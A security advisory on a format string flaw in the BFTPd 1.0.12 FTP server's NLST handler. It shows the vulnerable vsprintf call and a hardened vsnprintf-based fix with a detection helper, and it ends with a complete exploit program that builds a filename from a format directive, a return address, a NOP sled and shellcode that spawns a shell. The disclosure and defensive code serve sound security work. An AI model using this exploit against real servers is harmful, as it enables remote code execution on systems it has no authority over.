BFTPd is a Linux FTP server with chroot and setreuid functionality. The latest version of BFTPd has a format string vulnerability: when the NLST command is asked to list a file whose name contains format directives, the name is passed to vsprintf as the format string. The vulnerability allows remote attackers to overflow internal buffers and execute arbitrary code.
Credit:
The information has been provided by asynchro.
Vulnerable systems:
BFTPd 1.0.12
BFTPd calls vsprintf with an attacker-controlled format string. The relevant function is sendstrf:
int sendstrf(int s, char *format, ...) {
....
vsprintf(buffer, format, val);
When sendstrf is called from the NLST handler, the directory entry name is passed directly as the format argument, so any format directives in the filename are interpreted by vsprintf:
else
foo = 1;
sendstrf(s, entry->d_name);
}
Because vsprintf writes into a fixed-size buffer with no length limit, a filename whose directives expand to more than the buffer holds overflows it and can be used to execute arbitrary code.
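The defensive fix is to stop treating the directory entry name as a format string and to bound the output. The following is an added example written for this advisory, not BFTPd's own code: sendstrf_safe, send_name and has_format_directive are hypothetical names, and "%.260x" is the constructed sample filename from the advisory.

```c
/* Hardened replacement for BFTPd's sendstrf() (added example, not BFTPd's
 * own code). The original passes a directory entry name straight in as the
 * format argument of vsprintf; here the caller's text is always data and
 * the output is bounded. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define REPLY_BUF 512

/* Format into a fixed buffer; never overflows and always NUL-terminates.
 * Returns the number of characters that would have been written, so a
 * caller can detect truncation (result >= outlen). */
int sendstrf_safe(char *out, size_t outlen, const char *format, ...)
{
    va_list val;
    int n;
    va_start(val, format);
    n = vsnprintf(out, outlen, format, val);
    va_end(val);
    return n;
}

/* The fix for the NLST path: the filename is an argument to "%s", never the
 * format string itself, so a name such as "%.260x" is echoed back literally
 * instead of being expanded. */
int send_name(char *out, size_t outlen, const char *name)
{
    return sendstrf_safe(out, outlen, "%s", name);
}

/* Audit helper: flag a directory entry that contains a conversion
 * specification. Such names in an upload directory or in the server log
 * are a sign that this class of bug is being probed. */
int has_format_directive(const char *name)
{
    return strchr(name, '%') != NULL;
}

int main(void)
{
    char reply[REPLY_BUF];
    const char *probe = "%.260x";   /* constructed sample filename */
    send_name(reply, sizeof reply, probe);
    printf("reply: %s (suspicious=%d)\n", reply, has_format_directive(probe));
    return 0;
}
```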
Exploit:
/*
Creates a filename to exploit the bug in bftpd 1.0.12
Create the file, cwd in the shell directory and nlist the file directory
(sh is executed in the working dir because it is not possible to insert a / in
the filename)
hints by |CyRaX| & Cthulhu
coded by asynchro
www.pkcrew.org
*/
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 512
#define NOP 124
int main(void)
{
int i;
char *buff;
char nop=0x90;
char addr[]="\xd4\xf9\xff\xbf";
char command[]="touch %.260x";
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xffsh";
/* build the "touch <filename>" command line in a zeroed buffer */
buff=(char *) malloc(BUFSIZE);
memset(buff,0x0,BUFSIZE);
memcpy(buff,command,sizeof(command));
/* filename = format directive, address, NOP sled, shellcode */
strncat(buff,addr,4);
strncat(buff,addr,4);
for(i=0; i < NOP ;i++)
{
strncat(buff,&nop,1);
}
strncat(buff,shellcode,strlen(shellcode));
/* create the file with the crafted name */
system(buff);
free(buff);
return 0;
}